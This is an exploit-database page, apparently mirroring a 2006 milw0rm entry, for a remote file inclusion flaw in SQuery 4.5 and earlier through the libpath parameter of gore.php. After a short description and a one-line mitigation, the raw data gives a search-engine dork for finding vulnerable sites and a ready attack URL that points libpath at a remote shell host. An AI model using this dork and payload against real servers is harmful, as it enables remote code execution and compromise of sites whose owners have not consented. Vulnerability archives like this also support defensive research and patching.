SQuery - exploit.company

vendor:

SQuery

by:

SHiKaA

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: SQuery

Affected Version From: ALL VERSIONS

Affected Version To: ALL VERSIONS

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

SQuery <= 4.5(libpath) Remote File Inclusion Exploit

This exploit allows an attacker to include a remote file on the vulnerable server through the libpath parameter in gore.php. The attacker can execute arbitrary code on the vulnerable server by including a malicious file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

================================================================= 
SQuery <= 4.5(libpath) Remote File Inclusion Exploit            
=================================================================
Worked On : ALL VERSIONS                                         |
                                                                 |
Critical Level : Dangerous                                       |
                                                                 |
Gug Found In : gore.php                                          |
=================================================================
Dork :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
===============================================================================
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com

GreetZ :  BlAcK_BiRd  Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA Kosho-Man 3amer and #ALL MEMBER OF EL SLAM-CITY
=================================================================

# milw0rm.com [2006-07-10]